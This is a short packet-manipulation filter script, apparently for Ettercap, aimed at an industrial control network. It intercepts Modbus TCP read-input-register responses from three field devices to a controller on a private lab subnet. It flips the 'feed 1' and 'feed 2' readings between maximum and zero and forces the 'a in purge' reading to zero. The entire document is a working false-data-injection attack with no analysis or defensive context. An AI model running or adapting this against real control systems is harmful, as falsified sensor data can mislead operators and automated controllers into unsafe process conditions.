# when feed 1/feed 2 is below 32000 manipulate reading to 65535
# and to 0 otherwise
# manipulate a in purge reading to 0

# feed 1
if (ip.src == '192.168.95.10' && ip.dst == '192.168.95.2') {
    if (tcp.src == 502 && DATA.data + 7 == 0x04) {
        if (DATA.data + 11 < 0x7d) {
            DATA.data + 11 = 0xff;
            DATA.data + 12 = 0xff;
        } else {
            DATA.data + 11 = 0x00;
            DATA.data + 12 = 0x00;
        }
    }
}

#feed 2
if (ip.src == '192.168.95.11' && ip.dst == '192.168.95.2') {
    if (tcp.src == 502 && DATA.data + 7 == 0x04) {
        if (DATA.data + 11 < 0x7d) {
            DATA.data + 11 = 0xff;
            DATA.data + 12 = 0xff;
        } else {
            DATA.data + 11 = 0x00;
            DATA.data + 12 = 0x00;
        }
    }
}

# a in purge
if (ip.src == '192.168.95.15' && ip.dst == '192.168.95.2') {
    if (tcp.src == 502 && DATA.data + 7 == 0x04) {
        DATA.data + 9 = 0x00;
        DATA.data + 10 = 0x00;
    }
}
